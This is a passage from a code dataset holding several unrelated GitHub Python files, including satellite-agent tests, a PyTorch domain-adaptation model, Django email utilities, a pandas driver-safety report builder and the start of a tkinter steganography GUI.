CSV file\n df.to_csv('unique.csv', index=False)\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"🔍️ Duplicate Finder\")\nroot.configure(background=bg_color)\n\n# Set the window size\nwindow_width = 300\nwindow_height = 150\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\nx = (screen_width // 2) - (window_width // 2)\ny = (screen_height // 2) - (window_height // 2)\nroot.geometry(f\"{window_width}x{window_height}+{x}+{y}\")\n\n# Create a label and text box for the column name input\ninput_label = tk.Label(root, text=\"Enter the column name:\", foreground=fg_color, background=bg_color)\ninput_label.pack(pady=10)\n\ninput_box = tk.Entry(root, width=30, bg=bg_color, fg=fg_color)\ninput_box.pack(pady=5)\n\n# Create a button to select the CSV file\nselect_button = tk.Button(root, text=\"Select File\", command=select_file, bg=bg_color, fg=fg_color)\nselect_button.pack(pady=10)\n\n# Start the main event loop\nroot.mainloop()","repo_name":"jotaguerrero/python-scripts-toolkit","sub_path":"python/drop-n-save-duplicates.py","file_name":"drop-n-save-duplicates.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2369326689","text":"\"\"\"Test for agents module.\"\"\"\n# %% Imports\n\n# Standard Library Imports\nimport json\nfrom copy import deepcopy\n\n# Third Party Imports\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom numpy import array, asarray, eye, linspace, sqrt, zeros\n\n# Punch Clock Imports\nfrom punchclock.common.agents import Agent, Sensor, Target, buildRandomAgent\nfrom punchclock.common.constants import getConstants\nfrom punchclock.common.transforms import ecef2eci\nfrom punchclock.dynamics.dynamics_classes import (\n SatDynamicsModel,\n StaticTerrestrial,\n)\nfrom punchclock.estimation.ukf_v2 import UnscentedKalmanFilter\n\n# %% Build Filter\nprint(\"Build target_filter...\")\ndummy_dynamics = SatDynamicsModel()\nsat_dynamics = SatDynamicsModel()\nground_dynamics = StaticTerrestrial()\n\n\ndef dummyMeasurementDynamics(a):\n \"\"\"Dummy dynamics.\"\"\"\n return a.reshape([6, 1])\n\n\nest_x_inital = array([[7000, 0, 0, 0, 2, 0]]).transpose()\nest_p_initial = 1 * eye(6)\nr = 0.1 * eye(6)\nq = 0.01 * eye(6)\nmy_filter = UnscentedKalmanFilter(\n time=0,\n est_x=est_x_inital,\n est_p=est_p_initial,\n dynamics_model=dummy_dynamics,\n measurement_model=dummyMeasurementDynamics,\n q_matrix=q,\n r_matrix=r,\n)\n\n\n# %% Basic Tests\nprint(\"Instantiation tests...\")\n\na = Agent(\n dynamics_model=sat_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=\"A\",\n)\nprint(f\"Satellite agent: vars(agent) = \\n{vars(a)}\\n\")\n\nc = Sensor(\n dynamics_model=ground_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=\"A\",\n time=5,\n)\nprint(f\"Ground agent: vars(ground sensor) = \\n{vars(c)}\\n\")\n\nc.propagate(10)\nprint(f\"vars(ground sensor) after updating dynamics= \\n{vars(c)}\\n\")\n\nmu = getConstants()[\"mu\"]\nd = Agent(\n dynamics_model=sat_dynamics,\n init_eci_state=array([7000, 0, 0, 0, sqrt(mu / 7000), 0]),\n agent_id=\"derSat\",\n)\nprint(f\"New satellite agent: vars(sat agent) = \\n{vars(d)}\\n\")\n\nd.propagate(10)\nprint(\n f\"New satellite agent: vars(sat agent) after updating dynamics = \\n{vars(d)}\\n\"\n)\n\n# %% Test get measurement\nprint(\"Test getMeasurement...\")\ne = Target(\n dynamics_model=sat_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=2,\n target_filter=deepcopy(my_filter),\n)\nprint(\"Test with noise\")\nprint(f\" true state = {e.eci_state}\")\nprint(f\" measured state = \\n{e.getMeasurement()}\")\n\n# Test with no noise\nno_noise_filter = UnscentedKalmanFilter(\n time=0,\n est_x=est_x_inital,\n est_p=est_p_initial,\n dynamics_model=dummy_dynamics,\n measurement_model=dummyMeasurementDynamics,\n q_matrix=q,\n r_matrix=zeros([6, 6]),\n)\ne1 = Target(\n dynamics_model=sat_dynamics,\n init_eci_state=array([1, 2, 3, 4, 5, 6]),\n agent_id=2,\n target_filter=no_noise_filter,\n)\nprint(\"Test without noise\")\nprint(f\" true state = {e1.eci_state}\")\nprint(f\" measured state = \\n{e1.getMeasurement()}\")\nprint(\n f\" truth - measured = {asarray(e1.eci_state).squeeze() - e1.getMeasurement()}\"\n)\n# %% Test Propagation over multiple iterations\nprint(\"\\nTest Propagation over multiple iterations...\")\n\nx0_ecef = array([[7000, 0, 0, 0, 0, 0]]).transpose()\nx0_eci = ecef2eci(x0_ecef, 0)\nag_ground = Sensor(\n dynamics_model=StaticTerrestrial(),\n agent_id=\"A\",\n init_eci_state=x0_eci,\n)\nag_space = Sensor(\n dynamics_model=SatDynamicsModel(),\n agent_id=\"B\",\n init_eci_state=array([[8000, 1000, 0, 8, 0, 0]]).transpose(),\n)\n\ntime_vec = linspace(5, 5000)\nx_hist_ground = zeros([6, len(time_vec)])\nx_hist_space = zeros([6, len(time_vec)])\n\nfor i, t in enumerate(time_vec):\n ag_ground.propagate(t)\n ag_space.propagate(t)\n x_hist_ground[:, i] = ag_ground.eci_state.squeeze()\n x_hist_space[:, i] = ag_space.eci_state.squeeze()\n\n\nfig, ax = plt.subplots(2)\nax[0].plot(time_vec, x_hist_ground[:3, :].transpose())\nax[0].set_title(\"ground\")\nax[1].plot(time_vec, x_hist_space[:3, :].transpose())\nax[1].set_title(\"space\")\nplt.tight_layout()\n# %% Filter Tests\nprint(\"\\nFilter tests...\")\n# Functionality test\nprint(\" functionality test\")\nb = Target(\n dynamics_model=sat_dynamics,\n init_eci_state=array([7000, 0, 0, 0, 4, 0]),\n agent_id=2,\n target_filter=deepcopy(my_filter),\n time=0,\n)\nprint(f\"Target: vars(sat target) = \\n{vars(b)}\\n\")\nprint(f\"Target state: b.eci_state = \\n{b.eci_state}\")\n\n# targets must be tasked after state propagation\nprint(\" test propagation\")\nb.propagate(10)\nprint(f\"Target state after propagating: b.eci_state = \\n{b.eci_state}\")\n\n# test update nonphysical with tasking\nprint(\" test updateNonPhyiscal with tasking\")\nb.updateNonPhysical(task=True)\n\nprint(\"\\nrelevant vars(sat target) after nonphysical update with tasking:\")\nprint(f\"target.time = {b.time}\")\nprint(f\"target.num_tasked = {b.num_tasked}\")\nprint(f\"target.last_time_tasked = {b.last_time_tasked}\")\nprint(f\"target.target_filter.time = {b.target_filter.time}\")\nprint(f\"target.target_filter.est_x = \\n{b.target_filter.est_x}\")\n\n# test update nonphysical without tasking\nprint(\" test updateNonPhyiscal w/o tasking\")\nb.propagate(20)\nb.updateNonPhysical(task=False)\n\nprint(\"\\nrelevant vars(sat target) after nonphysical update without tasking:\")\nprint(f\"target.time = {b.time}\")\nprint(f\"target.num_tasked = {b.num_tasked}\")\nprint(f\"target.last_time_tasked = {b.last_time_tasked}\")\nprint(f\"target.target_filter.time = {b.target_filter.time}\")\nprint(f\"target.target_filter.est_x = \\n{b.target_filter.est_x}\")\n\n# test error catcher\nprint(\" Test updateNonPhyiscal with bad input\")\ntry:\n b.updateNonPhysical()\nexcept TypeError as err:\n print(err)\n\n# test second tasking\nprint(\" Test 2nd tasking\")\nb.propagate(60)\nb.updateNonPhysical(task=True)\nprint(\"\\nrelevant vars(sat target) after updating dynamics and tasking again:\")\nprint(f\"target.time = {b.time}\")\nprint(f\"target.num_tasked = {b.num_tasked}\")\nprint(f\"target.last_time_tasked = {b.last_time_tasked}\")\nprint(f\"target.target_filter.time = {b.target_filter.time}\")\nprint(f\"target.eci_state = \\n{b.eci_state}\")\nprint(f\"target.target_filter.est_x = \\n{b.target_filter.est_x}\")\n\n# %% Test toJson\nprint(\"\\ntoJson...\")\n# assign a attributes to be numpy dtypes to test conversion to python types\nc.last_time_tasked = np.float32(2.2)\nc.num_tasked = np.int64(10)\njson_dict = c.toDict()\n\n# check to make sure json can be dumped\njson_object = json.dumps(json_dict)\n\n# %% Test RandomAgent\nprint(\"\\nTest RandomAgent...\")\nragent = buildRandomAgent()\nprint(f\"random agent = {ragent}\")\nragent.propagate(ragent.time + 10)\nprint(f\"propagated state = {ragent.eci_state}\")\n\nragent = buildRandomAgent(dynamics_model=\"terrestrial\")\nprint(f\"random agent = {ragent}\")\nragent.propagate(ragent.time + 10)\nprint(f\"propagated state = {ragent.eci_state}\")\n# %%\nplt.show()\nprint(\"done\")\n","repo_name":"dylan906/clockpunch","sub_path":"tests/common/test_agents.py","file_name":"test_agents.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23639070671","text":"#!/usr/bin/env python\nimport sys\n\nif __name__ == '__main__':\n T = int(sys.stdin.readline()) \n\n for i in range(T):\n line = sys.stdin.readline()\n line.replace(\"\\n\", \"\")\n \n numbers = list(map(int, line.split()))\n\n N = numbers[0]\n S = numbers[1]\n p = numbers[2]\n\n threshold_normal_score = 2*max((p-1), 0) + p\n threshold_surprising_score = 2 * max((p-2), 0) + p\n \n count = 0\n surprising_count = 0\n\n for j in range(N):\n score_sum = numbers[3+j]\n\n if score_sum >= threshold_normal_score:\n count += 1\n elif (score_sum >= threshold_surprising_score) and (surprising_count < S):\n count += 1 \n surprising_count += 1\n \n\n print (\"Case #{0}: {1}\".format(i+1, count))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/1660.py","file_name":"1660.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087760841","text":"class Solution:\n def rectangleArea(self, rectangles: List[List[int]]) -> int:\n events = []\n for x1, y1, x2, y2 in rectangles:\n events.append((y1, 1, x1, x2))\n events.append((y2, -1, x1, x2))\n events.sort()\n\n def cal_x_len():\n l_x, lastx = 0, 0\n for x1, x2 in active:\n lastx = max(lastx, x1)\n l_x += max(0, x2 -lastx)\n lastx = max(lastx, x2)\n return l_x\n active = []\n lasty = events[0][0]\n rslt = 0\n for y, status, x1, x2 in events:\n rslt += cal_x_len()*(y-lasty)\n if status == 1:\n bisect.insort(active, (x1, x2))\n else:\n active.remove((x1, x2))\n lasty = y\n return rslt % (10**9 + 7)\n","repo_name":"Mela2014/lc_punch","sub_path":"lc850_array.py","file_name":"lc850_array.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30361579670","text":"import torch\nimport torch.nn as nn\nfrom torch import Tensor\n\nfrom torch import optim\n\nfrom networks.base_network import Generator, Discriminator, Classifier, Rx\n\n\nimport numpy as np\n\n\nfrom tqdm import tqdm\n\n\n\nclass MSTN(nn.Module):\n \"\"\"docstring for MSTN algo\"\"\"\n def __init__(self, args, gen= None, dis = None, clf = None):\n super(MSTN, self).__init__()\n \n self.gen = gen\n self.dis = dis\n self.clf = clf\n\n if self.gen == None :\n self.gen = Generator(args)\n if self.dis == None :\n self.dis = Discriminator(args)\n if self.clf == None :\n self.clf = Classifier(args)\n\n self.rx = Rx()\n \n self.n_features = args.n_features\n self.n_class = args.n_class\n self.s_center = torch.zeros((args.n_class, args.n_features), requires_grad = False, device=args.device)\n self.t_center = torch.zeros((args.n_class, args.n_features), requires_grad = False, device=args.device)\n self.disc = args.center_interita\n\n #def train_model(self, train = True):\n # self.dtrain = train\n\n def forward(self, x):\n features = self.gen(x)\n C_out = self.clf(features)\n D_out = self.dis(self.rx(features))\n return C_out, features, D_out\n\n\n\n\ndef update_centers(model, s_gen, t_gen, s_true, t_clf, args):\n source = torch.argmax(s_true, 1).reshape(t_clf.size(0),1).detach()# one Hot \n target = torch.argmax(t_clf, 1).reshape(t_clf.size(0),1).detach()\n\n s_center = torch.zeros(model.n_class, model.n_features, device=args.device)\n t_center = torch.zeros(model.n_class, model.n_features, device=args.device)\n\n s_zeros = torch.zeros(source.size()[1:], device=args.device)\n t_zeros = torch.zeros(target.size()[1:], device=args.device)\n\n for i in range(model.n_class):\n s_cur = torch.where(source.eq(i), s_gen, s_zeros).mean(0)\n t_cur = torch.where(target.eq(i), t_gen, t_zeros).mean(0)\n s_center[i] = s_cur * (1 - model.disc) + model.s_center[i] * model.disc\n t_center[i] = t_cur * (1 - model.disc) + model.t_center[i] * model.disc\n\n \n return s_center, t_center\n #return s_class, t_class\n\nadversarial_loss = torch.nn.BCELoss()\nclassification_loss = torch.nn.CrossEntropyLoss()\ncenter_loss = torch.nn.MSELoss(reduction='sum')\n\ndef eval_batch(model, sx, tx, s_true, t_true, opt,train, args):\n if train:\n opt.zero_grad()\n\n s_clf, s_gen, s_dis = model(sx)\n t_clf, t_gen, t_dis = model(tx)\n\n #helpers\n source_tag = torch.ones((sx.size(0), 1), device = args.device)\n target_tag = torch.zeros((tx.size(0), 1), device = args.device)\n s_true_hot = one_hot(s_true, model.n_class)\n #classification loss\n\n C_loss = classification_loss(s_clf, s_true.to(args.device))\n\n #generator loss\n s_G_loss = adversarial_loss(s_dis, source_tag)#0\n t_G_loss = adversarial_loss(t_dis, target_tag )#1\n G_loss = (s_G_loss + t_G_loss)\n\n \n #center loss more tricky\n s_c, t_c = update_centers(model, s_gen, t_gen, s_true_hot, t_clf, args)\n \n\n S_loss = center_loss(t_c, s_c)\n model.s_center = s_c.detach()\n model.t_center = t_c.detach()\n \n loss = C_loss + S_loss * args.lam + G_loss * args.lam\n if train: \n loss.backward()\n opt.step()\n\n\n s_acc = accuracy(s_clf, s_true.to(args.device))\n if t_true is not None :\n t_acc = accuracy(t_clf, t_true)\n else :\n t_acc= torch.tensor(0)\n return np.array([ S_loss.item(), C_loss.item(), G_loss.item(), s_acc.item(), t_acc.item()])\n \n\n\ndef run_epoch(model,opt, dataset, train, args):\n loss = np.zeros(5)\n device = args.device\n if train:\n model.train()\n else :\n model.eval()\n\n for sx, sy, tx, ty in tqdm(dataset):\n loss += eval_batch(model, sx.to(device), tx.to(device), sy, ty.to(device),opt, train, args)/len(dataset)\n if True: #todo args.verbose\n print(\"sem : {:6.4f},\\t clf {:6.4f},\\t Gen {:6.4f},\\t s_acc : {:6.4f},\\t acc : {:6.4f}\".format(*loss))\n return loss\n \ndef fit(args, epochs, model, opt, trainset, validset):\n out = list()\n\n for epoch in range(epochs):\n \n args.lam = adaptation_factor(epoch*1.0/epochs)\n \n train_loss = run_epoch(model,opt, trainset, train = True, args= args)\n valid_loss = run_epoch(model,None, validset, train = False, args = args)\n \n out.append((train_loss, valid_loss)) \n \n if args.save_step:\n file = open(args.save+\"_loss\", \"wb\")\n torch.save(model.state_dict(), args.save+'step')\n np.save(file,out)\n return out\n\n#utils\n\ndef adaptation_factor(qq):\n return 2/(1+np.exp(- 10 * qq )) - 1\ndef one_hot(batch,classes):\n ones = torch.eye(classes)\n return ones.index_select(0,batch)\n\n\ndef accuracy(pred, true):\n pred = pred.argmax(1)\n #print(pred, true)\n return (pred == true).float().mean()\n\n#not functional\ndef metric(pred,true, loss, args):#greedy\n n_class = args.n_class\n true = true.reshape(pred.size(0),1).to(device = args.device)\n zeros = torch.zeros((pred.size(0), 1), device = args.device)\n i_class = torch.zeros(n_class, device = args.device).long()\n cur_pred= pred\n for i in range(n_class):\n sum_class = torch.where(true.eq(i), cur_pred, zeros).sum(0)\n i_class[i] = torch.argmax(sum_class)\n true2 = one_hot(torch.tensor([i_class[i] for i in true]),n_class).to(device=args.device)\n return loss(pred, true2)\n","repo_name":"sally20921/MSTN","sub_path":"networks/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5480,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"26436848211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 10 19:09:06 2020\n\n@author: AsteriskAmpersand\n\"\"\"\nfrom Cstruct import PyCStruct\nfrom collections import OrderedDict\nfrom Chunk import chunkPath\nfrom pathlib import Path\nfrom FileLike import FileLike\n\nclass Header(PyCStruct):\n fields = OrderedDict([\n (\"IB\" , \"byte[4]\"),\n (\"unkn0\" , \"int32\"),\n (\"cnt\" , \"int32\"),])\n\nclass Clagger(PyCStruct):\n fields = OrderedDict([\n (\"unkn0\" , \"int32\"),\n (\"normal\" , \"float\"),\n (\"enrage\" , \"float\"),\n (\"fatigue\" , \"float\"),\n (\"hpRangeMod\" ,\"float[10]\"),\n (\"lowr\" , \"float\"),\n (\"highr\" , \"float\"),\n (\"masterr\" , \"float\"),])\n def __repr__(self):\n return ','.join([str(getattr(self,f)) for f in self.fields if \"unkn\" not in f])\n def header(self):\n return ','.join([f for f in self.fields.keys() if \"unkn\" not in f])\nclass Trail(PyCStruct):\n fields = OrderedDict([\n (\"unkn\" , \"int32[3]\")])\n\nclass ClaggerCommon():\n defaultPath = Path(chunkPath).joinpath(r\"common\\em\\em_clawgrab_common.dtt_clawc\")\n def __init__(self):\n self.Header = Header()\n self.ClaggerTables = []\n def marshall(self,data):\n self.Header.marshall(data)\n self.ClaggerTables = [Clagger().marshall(data) for i in range(self.Header.cnt)]\n self.Trail = Trail().marshall(data)\n @staticmethod\n def open(filepath = None):\n if filepath is None:\n filepath=ClaggerCommon.defaultPath\n clag = ClaggerCommon()\n with open(filepath,\"rb\") as inf:\n clag.marshall(FileLike(inf.read()))\n return clag\n def __getitem__(self,ix):\n return self.ClaggerTables[ix]","repo_name":"AsteriskAmpersand/QuestDataDump","sub_path":"clagger.py","file_name":"clagger.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"42644802934","text":"import sys\nimport h5py\nfrom glob import glob\n\n\ndef info(path):\n with h5py.File(path, \"r\") as f:\n first = (\"version\", \"model\")\n for k in first:\n print(\"{} = {}\".format(k, f[\"metadata\"][k][...]))\n for k, v in f[\"metadata\"].items():\n if k not in first:\n print(\"{} = {}\".format(k, v[...]))\n for k in (\"N\", \"L\", \"dt\", \"n_matmul\", \"n_delay\", \"n_sweep_warm\",\n \"n_sweep_meas\", \"period_eqlt\", \"period_uneqlt\"):\n print(\"{} = {}\".format(k, f[\"params\"][k][...]))\n\n\ndef main(argv):\n #rework this function to make sure it works on Windows\n for path_spec in argv[1:]:\n files = sorted(glob(path_spec))\n if len(files) == 0:\n print(\"No files matching:\"+path_spec)\n else:\n for f in files:\n print(f)\n info(f)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"edwnh/dqmc","sub_path":"util/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"5212398453","text":"from email.mime.image import MIMEImage\nimport random, string\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nimport gspread\nfrom django.conf import settings\n\n\ndef random_string_generator(length):\n uppercase_string = string.ascii_uppercase\n lowercase_string = string.ascii_lowercase\n digit_string = string.digits\n\n return ''.join(random.choices(uppercase_string + lowercase_string + digit_string, k=length))\n\ndef send_email(template,subject,to_emails,merge_data,connection=None,from_email=None,bcc=None):\n html_content = render_to_string(template, merge_data)\n message = EmailMultiAlternatives(\n subject= subject,\n from_email=from_email, \n to = to_emails,\n connection=connection,\n bcc=bcc,\n )\n message.attach_alternative(html_content,'text/html')\n message.send(fail_silently=False)\n\ndef send_email_img(template,subject,to_emails,merge_data,img,connection=None,from_email=None,bcc=None):\n html_content = render_to_string(template, merge_data)\n message = EmailMultiAlternatives(\n subject= subject, \n from_email=from_email,\n to = to_emails,\n connection=connection,\n bcc=bcc,\n )\n if img:\n mime_image = MIMEImage(img)\n mime_image.add_header('Content-ID', '')\n message.attach(mime_image)\n message.attach_alternative(html_content,'text/html')\n message.send(fail_silently=False)\n\n# Google API\n# scope = [\n# 'https://www.googleapis.com/auth/drive',\n# 'https://www.googleapis.com/auth/drive.file'\n# ]\n# def add_participant_to_google_sheet(user_info): \n# # Connect to google service account \n# gc = gspread.service_account_from_dict(settings.GOOGLE_JSON_KEY,scopes=scope)\n# # Get Spreadsheet\n# sheet = gc.open_by_key(settings.SPREADSHEET_ID)\n# participant_worksheet = sheet.worksheet('Participant')\n# #get last row\n# last_row = len(participant_worksheet.get_all_values())\n# #get field name\n# field_list = participant_worksheet.row_values(1)\n# col = 1\n# # Check if participant exist in spread, update exist participant and return\n# qr_exist = participant_worksheet.find(in_column=6,query=user_info.get('QRCode'))\n# if qr_exist is not None:\n# for field in field_list: \n# participant_worksheet.update_cell(qr_exist.row,col,str(user_info.get(field)))\n# col +=1\n# return\n# # Add new Participant to google sheet\n# for field in field_list: \n# participant_worksheet.update_cell(last_row + 1,col,str(user_info.get(field)))\n# col +=1\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip","repo_name":"minhhien98/TicketApp","sub_path":"users/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8101089917","text":"from datetime import datetime, timedelta\nimport os\n\nimport pandas as pd\n\ndef get_month_start(date: datetime=datetime.today()):\n month_start = (date - timedelta(days=date.day)).replace(day=1).date()\n return month_start\n\ndef get_month_end(date: datetime=datetime.today()):\n month_end = (date - timedelta(days=date.day)).date()\n return month_end\n\n\nclass Report:\n def __init__(self, report_directory:str, start_date: datetime=get_month_start(), end_date: datetime=get_month_end()):\n self.report_directory = report_directory\n self.start_date = start_date\n self.end_date = end_date\n\n def merge_reports(self, left_df: pd.DataFrame, right_df: pd.DataFrame, merge_column:str) -> pd.DataFrame:\n print('INFO: Merging reports')\n dataframe = pd.merge(left_df, right_df, how='left', on=merge_column)\n dataframe = dataframe.fillna(0)\n return dataframe\n\nclass EventsReport(Report):\n def __init__(self, report_directory, start_date: datetime=get_month_start(), end_date: datetime=get_month_end()):\n super().__init__(report_directory, start_date, end_date) \n print('EVENT INFO: Reading Individual Reports')\n try:\n self.read_all_reports()\n except TypeError as e:\n print(e)\n print('EVENT INFO: Combining Reports')\n self.base_report = self.combine_all_dataframes()\n print('EVENT INFO: Creating Final Events Report')\n self.final_report = self.create_final_report()\n\n\n def read_csv_to_dataframe(self, file_name: str, report_type: str) -> pd.DataFrame:\n \"\"\"Returns dataframe from CSV\n\n Args:\n file_name (str): Location of the file\n report_type (str): Name of the camera events that are being tracked in CSV. Lytx Reports doesnt name CSV appropriately.\n\n Returns:\n pd.DataFrame: Basic Dataframe with updated column names\n \"\"\"\n dataframe = pd.read_csv(file_name)\n dataframe = dataframe.drop(columns=['Total Score_Total', 'Total Score_Trend', 'Total Events_Trend', 'Recent Notes'])\n dataframe = dataframe.rename(columns={'Total Events_Total': report_type})\n dataframe = dataframe.fillna(0)\n return dataframe\n\n def read_all_reports(self) -> None:\n \"\"\"\n Loops through files in directory and reads each CSV in folder and adds to list of dataframes.\n Raises:\n TypeError: Invalid file types get skipped.\n \"\"\"\n self.all_reports = []\n for root, dirs, files in os.walk(self.report_directory):\n for file in files:\n if file == 'accidents_report.csv':\n print('EVENT INFO: Skipped Accident Report')\n continue\n if file.endswith('.csv'):\n report_type = file.replace('.csv', '').upper()\n self.all_reports.append(self.read_csv_to_dataframe(f'{root}{file}', report_type))\n else:\n raise TypeError(f'EVENTS ERROR: {file} is an invalid file type. Skipping this File.')\n\n def combine_all_dataframes(self) -> pd.DataFrame:\n \"\"\"\n Combines all dataframes ready by read_all_reports. Fills all empty cells with 0. \n\n Returns:\n pd.DataFrame: Combined dataframe.\n \"\"\"\n dataframe = pd.concat(self.all_reports)\n dataframe = dataframe.fillna(0)\n return dataframe\n\n def create_final_report(self) -> pd.DataFrame:\n \"\"\"Reformats base_report into a cleaner and more refined Report for final use.\n\n Returns:\n pd.DataFrame: Formatted Dataframe\n \"\"\"\n drivers = self.base_report.groupby('Employee ID')\n rows = []\n for i, driver in drivers:\n driver_id = i\n driver_fleet = driver['Group'].unique()[0]\n start_date = self.start_date\n end_date = self.end_date\n driver_row = {\n 'DRIVER': driver_id,\n 'FLEET': driver_fleet,\n 'START DATE': start_date,\n 'END DATE': end_date,\n 'HANDHELD DEVICE': driver['HANDHELD'].sum(),\n 'INATTENTIVE': driver['INATTENTIVE'].sum(),\n 'FOLLOWING DISTANCE': driver['FOLLOWING_DISTANCE'].sum(),\n 'LANE DEPARTURE': driver['LANE_DEPARTURE'].sum(),\n 'ROLLING STOP': driver['ROLLING_STOP'].sum(),\n 'CRITICAL DISTANCE': driver['CRITICAL_DISTANCE'].sum(),\n }\n rows.append(driver_row)\n return pd.DataFrame(rows)\n\n def final_report_to_csv(self, save_path: str=None):\n \"\"\"Creates CSV of final report. If save_path is provided the file will be saved there. If not it will be saved in current directory.\n Args:\n save_path (str, optional): Location you would like to save the new CSV to. Defaults to None.\n \"\"\"\n file_name = f'lytx_report_{self.start_date}.csv'\n print(f'<-- Saving Report to {os.getcwd()}\\lytx_report_{self.start_date}.csv -->')\n if save_path:\n self.final_report.to_csv(f'{save_path}{file_name}', index=False, header=False)\n else:\n self.final_report.to_csv(file_name, index=False, header=False)\n\nclass AccidentReport(Report):\n def __init__(self, report_directory, accidents_csv:str='accidents_report.csv', start_date: datetime=get_month_start(), end_date: datetime=get_month_end()):\n super().__init__(report_directory, start_date, end_date) \n self.accidents_csv = accidents_csv\n print('ACCIDENT INFO: Verifying Accident Report Exists')\n try:\n self.find_file()\n except FileNotFoundError as e:\n print(e)\n print('ACCIDENT INFO: Creating base Accidents Report')\n self.base_accidents_csv = self.read_file_to_dataframe()\n print('ACCIDENT INFO: Creating Final Accidents Report')\n self.final_report = self.create_final_report()\n\n def find_file(self):\n if os.path.isfile(f'{self.report_directory}{self.accidents_csv}'):\n print('ACCIDENT INFO: Accident File Found')\n return\n else:\n raise FileNotFoundError(f'ACCIDENT ERROR: {self.accidents_csv} not found in reports directory')\n\n def read_file_to_dataframe(self) -> pd.DataFrame:\n dataframe = pd.read_csv(f'{self.report_directory}{self.accidents_csv}')\n dataframe = dataframe[['Driver', 'Accident date', 'Preventable']]\n dataframe = dataframe.rename(columns={'Driver': 'DRIVER'})\n dataframe['Accident date'] = pd.to_datetime(dataframe['Accident date']).dt.date\n dataframe['Preventable'] = dataframe['Preventable'].replace({'Yes': True, 'No': False})\n\n return dataframe\n \n def create_final_report(self):\n total_preventable_accidents = self.base_accidents_csv.loc[self.base_accidents_csv['Preventable'] == True]\n driver_dataframes = []\n drivers = total_preventable_accidents.groupby('DRIVER')\n for driver_code, driver in drivers:\n month_accidents = driver.loc[(driver['Accident date'] < self.end_date) & (driver['Accident date'] > self.start_date)]\n driver_dataframes.append(\n {\n 'DRIVER': driver_code,\n 'ACCIDENTS THIS MONTH': len(month_accidents),\n 'TOTAL ACCIDENTS': len(driver)\n })\n dataframe = pd.DataFrame(driver_dataframes)\n return dataframe\n\nreport = EventsReport(f'{os.getcwd()}/reports/')\naccident_report = AccidentReport(f'{os.getcwd()}/reports/')","repo_name":"randybowers21/lytx_report_reader","sub_path":"lytx_report_reader/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27960434560","text":"from Embedding import Embedding\nfrom Extracting import Extracting\nfrom tkinter import filedialog\nfrom tkinter import Button\nfrom tkinter import Label\nfrom tkinter import Menu\nfrom tkinter import NORMAL\nfrom analysis import Analysis\n\n\nclass Window:\n \n def __init__(self,root):\n \n self.check = 1\n self.carrier_file = ''\n self.text_file = ''\n self.dirty_file = ''\n self.extracted_file = \"extracted_file.txt\"\n \n self.root = root\n self.root.title(\"LSB Algorithm\")\n self.root.geometry('600x300')\n \n # Menu\n self.menubar = Menu(self.root)\n\n embedding_menu = Menu(self.menubar, tearoff=0)\n self.menubar.add_cascade(label=\"Embedding\", menu=embedding_menu)\n embedding_menu.add_command(label=\"Choose text file\", command=self.text_open)\n embedding_menu.add_command(label=\"Choose carrier file\", command=self.carrier_open)\n \n extract_menu = Menu(self.menubar, tearoff=0)\n extract_menu.add_command(label=\"Choose dirty file\", command=self.dirty_open)\n self.menubar.add_cascade(label=\"Extracting\", menu=extract_menu)\n \n analysis_menu = Menu(self.menubar, tearoff=0)\n analysis_menu.add_command(label=\"PSNR\", command=self.PSNR)\n analysis_menu.add_command(label=\"SSIM\", command=self.SSIM)\n self.menubar.add_cascade(label=\"Analysis\", menu=analysis_menu, state = \"disabled\")\n \n self.menubar.add_command(label=\"exit\", command=self.quit)\n self.root.config(menu=self.menubar)\n \n # Buttons\n self.embed_button = Button(self.root, text=\"Embedding\", command = self.embed_function, state='disabled')\n self.extract_button = Button(self.root, text=\"Extracting\", command = self.extract_function, state='disabled')\n \n # Labels\n self.text_label= Label(self.root, text = '')\n self.carrier_label = Label(self.root, text = '')\n self.dirty_label = Label(self.root, text = '')\n self.algo_label = Label(self.root, text = 'No Algorithm done')\n self.PSNR_label = Label(self.root,text = '')\n self.SSIM_label = Label(self.root, text = '')\n \n # Placement\n self.embed_button.grid(column=1, row=0)\n self.extract_button.grid(column=1, row=2)\n self.text_label.grid(column=2, row=0)\n self.carrier_label.grid(column=2, row=1)\n self.dirty_label.grid(column=2, row=2)\n self.algo_label.grid(column=2, row=3)\n self.PSNR_label.grid(column=2, row=4)\n self.SSIM_label.grid(column=2, row=5)\n # Open files\n def 